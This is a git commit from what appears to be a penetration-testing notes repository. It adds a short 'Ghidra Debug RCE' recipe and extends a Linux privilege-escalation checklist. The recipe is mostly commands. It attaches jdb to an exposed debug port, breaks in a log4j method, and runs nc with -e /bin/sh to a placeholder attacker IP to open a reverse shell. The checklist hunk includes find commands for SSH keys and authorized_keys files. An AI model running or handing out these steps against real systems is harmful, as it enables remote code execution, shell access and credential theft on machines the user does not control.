added ghidra debugger exploit
This commit is contained in:
parent
b6708156ab
commit
b45e18400a
|
@ -0,0 +1,19 @@
|
||||||
|
# Ghidra Debug RCE
|
||||||
|
|
||||||
|
* If debug mode is enabled, connect to it via `jdb`
|
||||||
|
```sh
|
||||||
|
jdb -attach $TARGET_IP:$TARGET_PORT
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
classpath
|
||||||
|
classes
|
||||||
|
```
|
||||||
|
* Stop the service
|
||||||
|
```sh
|
||||||
|
stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
|
||||||
|
```
|
||||||
|
* Wait until the breakpoint hits and start a reverse shell
|
||||||
|
```sh
|
||||||
|
print new java.lang.Runtime().exec("nc.traditional $ATTACKER_IP 4449 -e /bin/sh")
|
||||||
|
```
|
||||||
|
|
|
@ -34,6 +34,10 @@ find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null
|
||||||
```
|
```
|
||||||
* [Shared object injection](../../../exploit/linux/shared_object_injection.md)
|
* [Shared object injection](../../../exploit/linux/shared_object_injection.md)
|
||||||
* [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/)
|
* [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/)
|
||||||
|
* User specific files
|
||||||
|
```sh
|
||||||
|
find / -user root -name "*.txt"
|
||||||
|
```
|
||||||
|
|
||||||
## Sudo Binary
|
## Sudo Binary
|
||||||
* [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md)
|
* [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md)
|
||||||
|
|
Loading…
Reference in New Issue